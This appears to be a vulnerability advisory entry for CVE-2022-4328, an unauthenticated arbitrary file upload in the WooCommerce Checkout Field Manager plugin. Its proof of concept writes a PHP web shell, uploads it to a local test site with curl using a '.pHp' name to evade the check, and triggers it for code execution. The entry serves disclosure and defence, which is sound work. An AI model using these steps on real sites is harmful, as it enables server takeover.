Lucene search
CydaveWPEX-ID:4DC72CD2-81D7-4A66-86BD-C9CFAF690EEDHistoryFeb 13, 2023 - 12:00 a.m.
WooCommerce Checkout Field Manager < 18.0 - Unauthenticated Arbitrary File Upload
2023-02-1300:00:00
cydave
113
woocommerce
unauthenticated
arbitrary file upload
EPSS
0.192
Percentile
96.4%
The plugin does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server
1. Install and activate woocommerce (dependency, no setup required)
2. Install and active the vulnerable plugin (n-media-woocommerce-checkout-fields 17.2)
3. Prepare the payload:
echo '<?php passthru("id"); ?>' > /tmp/payload.php
4. Invoke the following curl command to upload the payload (notice the name parameter is set to ".pHp"):
curl -i 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=cfom_upload_file&name=payload.pHp' \
-F 'file=@/tmp/payload.php'
5. Trigger the payload:
curl -i 'http://127.0.0.1:7777/wp-content/uploads/cfom_files/payload.php'
Related
nuclei
nuclei
WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload
2023-05-06 12:12:20
cvelist
cvelist
wpvulndb
wpvulndb
prion
prion
Code injection
2023-03-06 14:15:00
nvd
nvd
CVE-2022-4328
2023-03-06 14:15:09
cve
cve
CVE-2022-4328
2023-03-06 14:15:09
wordfence
wordfence